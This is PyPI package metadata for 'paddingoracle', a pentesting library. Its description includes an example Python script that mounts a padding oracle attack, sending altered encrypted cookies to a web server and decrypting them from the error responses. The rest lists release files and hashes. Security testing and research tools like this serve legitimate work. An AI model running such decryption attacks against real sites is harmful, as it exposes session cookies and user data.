{ "info": { "author": "Marcin Wielgoszewski", "author_email": "marcin.wielgoszewski@gmail.com", "bugtrack_url": null, "classifiers": [ "License :: OSI Approved :: BSD License", "Programming Language :: Python" ], "description": "python-paddingoracle: A portable, padding oracle exploit API\n============================================================\n\npython-paddingoracle is an API that provides pentesters a customizable\nalternative to `PadBuster`_ and other padding oracle exploit tools that can't\neasily (without a heavy rewrite) be used in unique, per-app scenarios. Think\nnon-HTTP applications, raw sockets, client applications, unique encodings, etc.\n\nUsage:\n------\n\nTo use the paddingoracle API, simply implement the **oracle()** method from the\nPaddingOracle API and raise a **BadPaddingException** when the decrypter\nreveals a padding oracle. To decrypt data, pass raw encrypted bytes to\n**decrypt()** with a block size (typically 8 or 16) and optional iv parameter.\n\nSee below for an example (from `the example`_): ::\n\n from paddingoracle import BadPaddingException, PaddingOracle\n from base64 import b64encode, b64decode\n from urllib import quote, unquote\n import requests\n import socket\n import time\n\n class PadBuster(PaddingOracle):\n def __init__(self, **kwargs):\n super(PadBuster, self).__init__(**kwargs)\n self.session = requests.Session()\n self.wait = kwargs.get('wait', 2.0)\n\n def oracle(self, data, **kwargs):\n somecookie = quote(b64encode(data))\n self.session.cookies['somecookie'] = somecookie\n\n while 1:\n try:\n response = self.session.get('http://www.example.com/',\n stream=False, timeout=5, verify=False)\n break\n except (socket.error, requests.exceptions.RequestException):\n logging.exception('Retrying request in %.2f seconds...',\n self.wait)\n time.sleep(self.wait)\n continue\n\n self.history.append(response)\n\n if response.ok:\n logging.debug('No padding exception raised on %r', somecookie)\n return\n\n # An HTTP 500 error was returned, likely due to incorrect padding\n raise BadPaddingException\n\n if __name__ == '__main__':\n import logging\n import sys\n\n if not sys.argv[1:]:\n print 'Usage: %s ' % (sys.argv[0], )\n sys.exit(1)\n\n logging.basicConfig(level=logging.DEBUG)\n\n encrypted_cookie = b64decode(unquote(sys.argv[1]))\n\n padbuster = PadBuster()\n\n cookie = padbuster.decrypt(encrypted_cookie, block_size=8, iv=bytearray(8))\n\n print('Decrypted somecookie: %s => %r' % (sys.argv[1], cookie))\n\n\nCredits\n-------\npython-paddingoracle is a Python implementation heavily based on `PadBuster`_,\nan automated script for performing Padding Oracle attacks, developed by\nBrian Holyfield of Gotham Digital Science.\n\n.. _`the example`: https://github.com/mwielgoszewski/python-paddingoracle/blob/master/example.py\n.. _`PadBuster`: https://github.com/GDSSecurity/PadBuster\n", "description_content_type": null, "docs_url": null, "download_url": "UNKNOWN", "downloads": { "last_day": -1, "last_month": -1, "last_week": -1 }, "home_page": "https://github.com/mwielgoszewski/python-paddingoracle", "keywords": null, "license": "UNKNOWN", "maintainer": null, "maintainer_email": null, "name": "paddingoracle", "package_url": "https://pypi.org/project/paddingoracle/", "platform": "UNKNOWN", "project_url": "https://pypi.org/project/paddingoracle/", "project_urls": { "Download": "UNKNOWN", "Homepage": "https://github.com/mwielgoszewski/python-paddingoracle" }, "release_url": "https://pypi.org/project/paddingoracle/0.2.2/", "requires_dist": null, "requires_python": null, "summary": "A portable, padding oracle exploit API", "version": "0.2.2" }, "last_serial": 1947460, "releases": { "0.2": [ { "comment_text": "", "digests": { "md5": "1e0030b6dc92587cdf51cf8796906e60", "sha256": "95444740f1ecf78ac7799069ada9abadb77b121217c6fdef2a81802f8c2403bf" }, "downloads": -1, "filename": "paddingoracle-0.2-py2.7.egg", "has_sig": false, "md5_digest": "1e0030b6dc92587cdf51cf8796906e60", "packagetype": "bdist_egg", "python_version": "2.7", "requires_python": null, "size": 8057, "upload_time": "2013-11-07T17:11:21", "url": "https://files.pythonhosted.org/packages/68/b2/96cf268a0f1844b3ddb4b9839b49eadb98bcb2fac177f1ea50658bafae51/paddingoracle-0.2-py2.7.egg" }, { "comment_text": "", "digests": { "md5": "e01748f4f4173ce56ee16165b245f940", "sha256": "b30fc78b2138b049e61c882b3752c1d8019520a7e9e76eeb8083341e5dc47fe7" }, "downloads": -1, "filename": "paddingoracle-0.2.tar.gz", "has_sig": false, "md5_digest": "e01748f4f4173ce56ee16165b245f940", "packagetype": "sdist", "python_version": "source", "requires_python": null, "size": 5022, "upload_time": "2013-11-07T17:11:19", "url": "https://files.pythonhosted.org/packages/8c/d4/0f0f5919042f9cde5cfc3abde09ddca0f84b0d38838b91d941f6790ef46f/paddingoracle-0.2.tar.gz" } ], "0.2.1": [ { "comment_text": "", "digests": { "md5": "357171b263ca40cd74cb40a0d209b64a", "sha256": "60a8d3e5579fea914659d16f0b6e83a26f0cb03f9339760a11f29a25e00a3aeb" }, "downloads": -1, "filename": "paddingoracle-0.2.1.tar.gz", "has_sig": false, "md5_digest": "357171b263ca40cd74cb40a0d209b64a", "packagetype": "sdist", "python_version": "source", "requires_python": null, "size": 5084, "upload_time": "2014-11-25T14:07:36", "url": "https://files.pythonhosted.org/packages/65/55/2d52e12e9196958f7e2529cb4683b2e9cbc1e14f7fe411ebb1abb3348c79/paddingoracle-0.2.1.tar.gz" } ], "0.2.2": [ { "comment_text": "", "digests": { "md5": "eb6224f3fdda27a7b3c6d9f21f7c8541", "sha256": "0a2432d8911f9d2e31d261585dba3af571b7d2e71971cb731360a25ccbeda8c2" }, "downloads": -1, "filename": "paddingoracle-0.2.2-py2-none-any.whl", "has_sig": false, "md5_digest": "eb6224f3fdda27a7b3c6d9f21f7c8541", "packagetype": "bdist_wheel", "python_version": "2.7", "requires_python": null, "size": 5593, "upload_time": "2016-02-09T13:36:55", "url": "https://files.pythonhosted.org/packages/48/46/198eaee3113990344c8260e9fca87e573d83fe08ca24db1d15a59cb3df8f/paddingoracle-0.2.2-py2-none-any.whl" }, { "comment_text": "", "digests": { "md5": "f59e537b890a0ba6cbfaa9bd68dc5d50", "sha256": "bfa836e7a9971484f6b44ad61972ed81adc58a1c4d1ecc11e090fa1e8849803d" }, "downloads": -1, "filename": "paddingoracle-0.2.2.tar.gz", "has_sig": false, "md5_digest": "f59e537b890a0ba6cbfaa9bd68dc5d50", "packagetype": "sdist", "python_version": "source", "requires_python": null, "size": 5255, "upload_time": "2016-02-09T13:36:31", "url": "https://files.pythonhosted.org/packages/74/8d/b12a6ce3e5e5f77a2d8513ae4f45b925741e83c5a116f6fbc79f987a5507/paddingoracle-0.2.2.tar.gz" } ] }, "urls": [ { "comment_text": "", "digests": { "md5": "eb6224f3fdda27a7b3c6d9f21f7c8541", "sha256": "0a2432d8911f9d2e31d261585dba3af571b7d2e71971cb731360a25ccbeda8c2" }, "downloads": -1, "filename": "paddingoracle-0.2.2-py2-none-any.whl", "has_sig": false, "md5_digest": "eb6224f3fdda27a7b3c6d9f21f7c8541", "packagetype": "bdist_wheel", "python_version": "2.7", "requires_python": null, "size": 5593, "upload_time": "2016-02-09T13:36:55", "url": "https://files.pythonhosted.org/packages/48/46/198eaee3113990344c8260e9fca87e573d83fe08ca24db1d15a59cb3df8f/paddingoracle-0.2.2-py2-none-any.whl" }, { "comment_text": "", "digests": { "md5": "f59e537b890a0ba6cbfaa9bd68dc5d50", "sha256": "bfa836e7a9971484f6b44ad61972ed81adc58a1c4d1ecc11e090fa1e8849803d" }, "downloads": -1, "filename": "paddingoracle-0.2.2.tar.gz", "has_sig": false, "md5_digest": "f59e537b890a0ba6cbfaa9bd68dc5d50", "packagetype": "sdist", "python_version": "source", "requires_python": null, "size": 5255, "upload_time": "2016-02-09T13:36:31", "url": "https://files.pythonhosted.org/packages/74/8d/b12a6ce3e5e5f77a2d8513ae4f45b925741e83c5a116f6fbc79f987a5507/paddingoracle-0.2.2.tar.gz" } ] }